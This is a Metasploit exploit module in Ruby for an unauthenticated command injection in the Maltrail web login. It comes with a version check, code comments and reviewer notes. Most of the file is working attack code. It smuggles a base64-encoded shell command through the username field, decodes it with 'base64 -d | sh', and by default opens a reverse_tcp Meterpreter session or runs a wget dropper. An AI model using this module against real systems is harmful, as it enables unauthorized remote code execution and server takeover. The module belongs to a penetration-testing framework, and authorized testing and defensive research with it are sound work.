Path: blob/master/modules/exploits/unix/http/maltrail_rce.rb
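##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated OS command injection in the Maltrail web login handler.
#
# The `username` form field of `POST /login` is interpolated into a shell
# command on the server side, so a crafted username runs arbitrary commands
# as the Maltrail process user. The module delivers the payload base64-encoded
# and decodes it on the target with `base64 -d | sh`.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  # First release the check treats as patched: anything strictly below this is
  # reported as vulnerable. NOTE(review): the module description says
  # "versions <= 0.54" are affected, which disagrees with this threshold; the
  # code keeps the original `< 0.54` comparison — confirm against the upstream fix.
  FIXED_VERSION = '0.54'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Maltrail Unauthenticated Command Injection',
        'Description' => %q{
          Maltrail is a malicious traffic detection system, utilizing publicly
          available blacklists containing malicious and/or generally suspicious trails.
          The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.
          The `subprocess.check_output` function in `maltrail/core/httpd.py` contains
          a command injection vulnerability in the `params.get("username")` parameter.
          An attacker can exploit this vulnerability by injecting arbitrary OS commands
          into the username parameter. The injected commands will be executed with the
          privileges of the running process. This vulnerability can be exploited remotely
          without authentication.

          Successfully tested against Maltrail versions 0.52 and 0.53.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Ege BALCI <egebalci[at]pm.me>', # msf module
          'Valentin Lobstein', # Add CVE reference + rewrite
          'Chris Wild', # original PoC, analysis
        ],
        # The CVE entry was listed twice in the original; one entry is enough.
        'References' => [
          ['CVE', '2025-34073'],
          ['EDB', '51676'],
          ['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],
          ['URL', 'https://github.com/stamparm/maltrail/issues/19146']
        ],
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => :wget,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DisclosureDate' => '2023-07-31',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # NOTE(review): the injection rides on a failed-login code path; if the
          # server logs such attempts, IOC_IN_LOGS would apply — confirm before adding.
          'SideEffects' => []
        }
      )
    )
    register_options(
      [
        Opt::RPORT(8338),
        OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])
      ]
    )
  end

  # Fingerprints the target by scraping the version banner from the landing page.
  #
  # @return [Msf::Exploit::CheckCode] Appears when a version below
  #   FIXED_VERSION is found, Safe when the version is at or above it, and
  #   Unknown when there is no response, a non-200 status, or no banner.
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    )
    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

    # The landing page embeds the release as "(v<b>0.53</b>)".
    match = res.body.to_s.match(%r{\(v<b>([0-9.]+)</b>\)})
    # The original compared a nil version when the banner was missing (proxy,
    # customised page, unrelated service on the port) and raised NoMethodError;
    # report the situation instead of crashing the check.
    return CheckCode::Unknown("#{peer} - Could not find a Maltrail version banner in the response") if match.nil?

    version = Rex::Version.new(match[1])
    return CheckCode::Appears("Version Detected: #{version}") if version < Rex::Version.new(FIXED_VERSION)

    CheckCode::Safe("Version Detected: #{version}")
  end

  # Sends one shell command through the vulnerable `username` parameter.
  #
  # The command is base64-encoded and decoded on the target so that payload
  # bytes do not need to survive the shell quoting of the injection point. The
  # `+` characters in the body are form-encoded spaces; `uri_encode_mode` 'none'
  # keeps them and the backticks from being re-encoded.
  #
  # NOTE(review): standard base64 output can itself contain `+`, which a
  # form-urlencoded parser would also turn into a space. If a payload ever fails
  # at `base64 -d`, percent-encoding the blob is the first thing to try —
  # confirm against how Maltrail decodes the POST body.
  #
  # @param cmd [String] the command to run on the target
  # @param _opts [Hash] unused, required by the CmdStager interface
  # @return [Rex::Proto::Http::Response, nil] the HTTP response, if any
  def execute_command(cmd, _opts = {})
    encoded = Rex::Text.encode_base64(cmd)
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'login'),
      'method' => 'POST',
      'uri_encode_mode' => 'none',
      # `ctype` is a send_request_cgi option, not a header name. The original
      # placed it under 'headers', which emits a literal "ctype:" header
      # instead of Content-Type.
      'ctype' => 'application/x-www-form-urlencoded',
      'data' => "username=;`echo+\"#{encoded}\"+|+base64+-d+|+sh;#`"
    )
  end

  # Dispatches on the selected target: a bare command payload is sent directly,
  # the ELF dropper goes through the wget command stager.
  def exploit
    print_status("Executing #{target.name}...")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    else
      fail_with(Failure::BadConfig, "Unsupported target type: #{target['Type']}")
    end
  end
end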